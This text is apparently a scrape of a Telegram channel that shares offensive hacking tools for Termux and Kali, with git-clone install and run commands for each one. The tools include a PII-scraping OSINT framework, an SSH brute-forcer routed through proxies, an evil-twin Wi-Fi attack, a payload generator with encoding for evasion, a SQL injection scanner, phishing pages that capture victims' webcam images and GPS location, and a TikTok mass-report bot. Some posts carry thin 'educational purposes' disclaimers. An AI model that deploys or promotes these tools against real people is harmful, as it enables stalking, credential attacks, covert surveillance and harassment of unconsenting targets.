Termux
2.19K subscribers
670 photos
83 videos
407 files
739 links
Termux-Collection
Download Telegram
Skiptracer - OSINT scraping framework

Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Skiptracer utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.

Installation

$ git clone https://github.com/xillwillx/skiptracer.git skiptracer
$ cd skiptracer

Install requirements

$ pip install -r requirements.txt

Run

$ python skiptracer.py -l (phone|email|sn|name|plate)

The modules will allow queries for the following:
- Phone
- Email
- Screen names
- Real names
- Addresses
- IP
- Hostname
- Breach Credentials

Disclaimer:- This project was created for educational purposes and should not be used in environments without legal authorization.

https://gitlab.com/illwill/skiptracer
πŸ‘4❀1
fluxion.zip
11.1 MB
☰☲☷ FLU [X] I0N ☰☲☷
                ☲  WI-FI ☲
                     Ver: 6.9


Installation:-

cp $(find /sdcard/Download -name fluxion.zip) ./;unzip fluxion.zip && rm -rf fluxion.zip;cd fluxion;mv fluxion /usr/bin;chmod 755 /usr/bin/fluxion;cd .. && mv fluxion /usr/share


Howto? (make sure to run user interface in vnc/kex as root)

Now you can just type fluxion and done ;)
πŸ‘2
Orbitaldump:-- A Simple Multi-Threaded Distributed SSH Brute-Forcing Tool Written In Python.
When the script is executed without the --proxies switch, it acts just like any other multi-threaded SSH brute-forcing script. When the --proxies switch is added, the script pulls a list (usually thousands) of SOCKS4 proxies from ProxyScrape and launch all brute-force attacks over the SOCKS4 proxies so brute-force attempts will be less likely to be rate-limited by the target host.
Usages:-

https://github.com/k4yt3x/orbitaldump


Note:- This tool is only for educational purposes. We are not responsible for any misuse or illegal activities.

Facebook Page:-

https://www.facebook.com/ZeroDayExploitware
❀2πŸ‘1
ΒΆΒΆ waf-bypass
Check your WAF before an attacker does

WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.

πŸ“git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
πŸ“python3 -m pip install -r /opt/waf-bypass/requirements.txt
πŸ“python3 /opt/waf-bypass/main.py --host='example.com'
πŸ‘1
ΒΆΒΆ Beta_Nicco
An advance payload generation tool which automates your payload creation work. It also features some feature like ;-

sudo apt-get update && sudo apt-get upgrade -y
πŸ“git clone https://github.com/empath1928/Beta_Nicco
πŸ“cd Beta_Nicco
πŸ“ls
πŸ“chmod +x setup.sh
πŸ“./setup.sh OR bash setup.sh

[ 1 ] ---> Payload for any platform
[ 2 ] ---> Encoding the payload for aviation
[ 3 ] ---> Auto listner as well as Custom for easy process
❀1πŸ‘1
ΒΆΒΆ INFO-X
Info-X is a information gathering tool...with this tool You can get vectims like ip , gmail , phone number information
#osint #info #ip #phonenumber

πŸ“pkg update
πŸ“pkg upgrade
πŸ“pkg install python
πŸ“pkg install git
πŸ“pip install requests
πŸ“pip install bs4
πŸ“pip install futures
πŸ“pip install mechanize
πŸ“cd $HOME
πŸ“rm -rf INFO-X
πŸ“git clone --depth=1 https://github.com/U7P4L-IN/INFO-X.git
πŸ“cd INFO-X
πŸ“python INFO.py

[01] Track IP Address
[02] Phone Number Info
[03] E-Mail Info
[04] More Tools
[05] Contract Me
[00] Exit
πŸ‘11❀6
ΒΆΒΆ https://osintframework.com/

OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.
#osint

------------------------
Documentation
OpSec
Threat Intelligence
Exploits & Advisories
Malicious File Analysis
Tools
Encoding / Decoding
Classifieds
Digital Currency
Dark Web
Terrorism
Mobile Emulation
Metadata
Language Translation
Archives
Forums / Blogs / IRC
Search Engines
Geolocation Tools / Maps
Transportation
Business Records
Public Records
Telephone Numbers
Dating
People Search Engines
Instant Messaging
Social Networks
Images / Videos / Docs
IP Address
Domain Name
ΒΆΒΆ tidos-framework
The Offensive Manual Web Application Penetration Testing Framework. #recon #kalitools #nethunter


πŸ“git clone https://github.com/0xinfection/tidos-framework.git
πŸ“cd tidos-framework

πŸ“sudo apt-get install libncurses5 libxml2 nmap tcpdump libexiv2-dev build-essential python3-pip libmariadbclient18 libmysqlclient-dev tor konsole

πŸ“pip3 install -r requirements.txt
πŸ“sudo python3 tidconsole.py
πŸ“sudo git pull ( to update to latest )

ΒΆΒΆ need to set your own API KEYS for various OSINT & Scanning and Enumeration purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS.


ΒΆΒΆ Comands
πŸ“list all
  -----
  aid
  infdisc
  osint-active
  osint-passive
  post
  scan
  sploit
  vlnysis

πŸ“load  or load all ( or list all )
πŸ“vicdel all (remove all added url)
πŸ“vicadd (after that url  example google.com)
πŸ“info
πŸ“attack

ΒΆΒΆ Youtube link : https://youtu.be/8SZXnhCvUXc
πŸ‘4❀1
ΒΆΒΆ symbiote
Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. IP / Device Details By requesting camera permission on the victim's device,
#ip #device #info #browser #phishing #camera #seeker #vidphisher #storm-breaker #ngrok #localhost

πŸ“sudo apt update && upgrade
πŸ“sudo apt install python -y
πŸ“sudo apt install wget -y
πŸ“sudo apt install php -y
πŸ“sudo apt install openssh-client -y
πŸ“sudo apt install jq -y
πŸ“sudo ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa <<<y >/dev/null 2>&1

πŸ“git clone https://github.com/hasanfirnas/symbiote
πŸ“cd symbiote
πŸ“python3 symbiote.py
πŸ“cd Server
πŸ“./loclx account login
now enter your access token from https://localxpose.io/



ΒΆΒΆ To check for cam file :
πŸ“cd symbiote
πŸ“cd CapturedData
πŸ“ls
πŸ“termux-open <file_name>

ΒΆΒΆ Youtube link :
https://youtu.be/j8rTc3CI7UA
❀6πŸ‘3
ΒΆΒΆ SWS-Recon-Tool
SWS-Recon is a Python Tool designed to performed Reconnaissance on the given target website- Domain or SubDomain. SWS-Recon collects information such as Google Dork, DNS Information, Sub Domains, PortScan, Subdomain takeovers, Reconnaissance On Github and much more vulnerability scan. #recon #osint #info #nethunter


πŸ“sudo apt-get install libxml2-dev libxslt-dev
πŸ“git clone https://github.com/ShobhitMishra-bot/SWS-Recon-Tool.git
πŸ“cd SWS-Recon-Tool
πŸ“pip3 install -r requirements.txt
πŸ“python3 SWS-Recon.py -h
πŸ‘3
ΒΆΒΆphisherprice
Multi-Functional Pentest Tool, Command Them All From One Script. #recon #cracking #Th3inspector #networking #TermuxToolx #nethunter

πŸ“git clone https://github.com/SirCryptic/phisherprice
πŸ“cd phisherprice
πŸ“chmod +x phisherprice.sh
πŸ“sudo ./phisherprice.sh
or
πŸ“sudo bash phisherprice.sh

ΒΆΒΆ Changing API Key :
ΒΆΒΆ Example : sudo nano phisherprice.sh

https://rapidapi.com/blackbunny/api/bank-card-bin-num-check
https://apilayer.com/marketplace/email_verification-api
https://apilayer.com/marketplace/number_verification-api
https://www.shodan.io

β”‚Main Menu
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚1 β”‚Recon
β”‚2 β”‚Cracking
β”‚3 β”‚AutoxSploits
β”‚4 β”‚Networking
β”‚5 β”‚C.Y.O xSploits
β”‚6 β”‚AutoExif
β”‚7 β”‚SE Toolkit
β”‚8 β”‚Start Th3inspector
β”‚u β”‚Update Script
β”‚c β”‚Contact Information
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
❀4πŸ‘4
ΒΆΒΆ ghauri
Advance SQL Injection Scanner
#sql #scan #url #vuln

πŸ“git clone https://github.com/r0oth3x49/ghauri.git
πŸ“cd ghauri
πŸ“ls
πŸ“pip install -r requirements.txt
πŸ“python3 setup.py install
πŸ“ghauri -h
πŸ“ghauri -u 'your-url' --dbs
πŸ‘7❀1
ΒΆΒΆ hound
Hound is a simple and light tool for information gathering and capture exact GPS coordinates and can also grab basic information about the system and ISP. This tool can be very helpful in information gathering
#track #ip #location #isp #browser

Longitude
Latitude
Device Model
Operating System
Number of CPU Cores
Screen Resolution
User agent
Public IP Address
Browser Name
ISP Information

ΒΆΒΆ Install on kali/termux

πŸ“apt-get -y install php unzip git wget
πŸ“git clone https://github.com/techchipnet/hound
πŸ“cd hound
πŸ“bash hound.sh
πŸ‘6❀2
Rebomb2AppWithProxies (2).zip
18.6 MB
ΒΆΒΆ ReBomb2 - TikTok Mass Report Bot
THIS DOES NOT GAURANTEE A BAN. STILL UP TO TIKTOK, THIS JUST INCREASES THE CHANCES OF THE RIGHT PERSON SEEING THE REPORT OR CONFUSING THE AI THAT SUPPOSEDLY CONTROLS THE REPORTING.


ΒΆΒΆ DOWNLOAD THE ZIP FILE "REBOMB2APPWITHPROXIES" Scroll down to the "Rebomb2App"
https://github.com/Sadyyn/ReBomb2

ΒΆΒΆ TUTORIAL WITH ADDED PROXIES: https://youtu.be/J5nxUckD7Wk
https://youtu.be/MdQrD_H8ZoI
πŸ‘2❀1
ΒΆΒΆ Fluxion
#wifihacking #fluxion #kali #nethunter


#Eviltwinattack most of the time we have to use two adapters to work with eviltwin attack on tools like  fluxion and wifiphisher . We changed internel wifi card to a realtek  which will work on wlan0 ( supports monitor mode & packet injection ) You can buy On ebay & aliexpress for around 2 to 4usd  (2.4ghz & 5ghz supports )
wlan1 will be externel wifi adapter
#Wifihacking
#fluxion

ΒΆΒΆ How to install Fluxion on kali linux
1) https://youtu.be/oGpM48NeLdc
2) https://youtu.be/OBwHhmfuvzQ

ΒΆΒΆ for android Device must be rooted & Ur device must  have nethunter Supported Kernel & externel wifi adapter like showed on this video : https://t.me/termuxtoolx/2268


ΒΆΒΆ Fluxion on android zip file
https://t.me/termuxtoolx/2273
ΒΆΒΆ For wifi adapters search on channel #adapter
❀3πŸ‘3πŸ₯°1